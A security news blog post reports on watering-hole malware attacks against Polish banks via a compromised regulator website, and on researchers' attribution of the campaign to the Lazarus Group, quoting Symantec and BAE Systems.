Lazarus mob possibly behind malware attacks against Polish banks

Exploit kit used in Polish attacks found targeting other orgs, too.

David Bisson
@DMBisson

A hacking gang known as the Lazarus Group might be responsible for malware attacks that have targeted Polish banks and other financial organizations.

In the beginning of February, the security community first learned about a string of attacks that targeted at least 20 Polish banks.

Each of the financial institutions found indicators of compromise (IoCs) belonging to a single unknown malware. Available evidence suggests these infections occurred after bank employees visited the website for the Polish Financial Supervision Authority. Indeed, investigators believe someone modified a .JS JavaScript file hosted on the regulatory authority’s web server with malicious code. That code redirected visitors to an exploit kit that downloaded a remote access trojan (RAT) onto their machines.

Sign up to our newsletter
Security news, advice, and tips.

Analysis into these infections remains ongoing.

Security firm Symantec is just one of the firms currently studying these incidents. You can imagine its Security Response researchers’ surprise, therefore, when they recognized the exploit kit involved in the infections. In fact, they had blocked dozens of attacks launched by that very same perpetrators against targets in Mexico, Uruguay, and Poland since 2014.

Symantec explains more in a blog post:

“The attackers appear to be using compromised websites to redirect visitors to a customized exploit kit, which is preconfigured to only infect visitors from approximately 150 different IP addresses. These IP addresses belong to 104 different organizations located in 31 different countries. The vast majority of these organizations are banks, with a small number of telecoms and internet firms also on the list.”

Countries in which three or more organizations were targeted by attackers. (Source: Symantec)

Symantec’s researchers go on to say they’ve never before come across the exploit kit’s malware sample, which goes by the name “Ratankba.” But they did recognize a Hacktool retrieved by the malware from its command and control (C&C) server.

The tool appears to be the work of Lazarus, a hacking gang which has been targeting organizations since at least 2009. Lazarus is known for preying upon institutions in the United States and South Korea especially. Even so, its notoriety is global in scope. Some evidence even links Lazarus to the Bangladesh Bank heist that occurred back in 2016.

Additional analysis by other security firms corroborates Lazarus’ involvement in the Polish malware campaigns. Researchers at BAE Systems, for example, found that one of the samples used in the attacks appears to belong to the threat actor’s toolkit.

Source: BAE Systems

The BAE researchers don’t attribute Lazarus conclusively for the attacks. But they do say they wouldn’t be surprised if the group was behind them. As they observe in an article:

“The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear. However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.”

If Lazarus is responsible for these malware infections, it’s more important than ever for organizations to use the IoCs associated with the Polish malware attacks and update their own defenses. Those indicators are replicated by both Symantec and BAE Systems in their respective write-ups of this threat.

Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post.


David Bisson is an infosec news junkie and security journalist. He works as Contributing Editor for Graham Cluley Security News and Associate Editor for Tripwire's "The State of Security" blog.

What do you think? Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.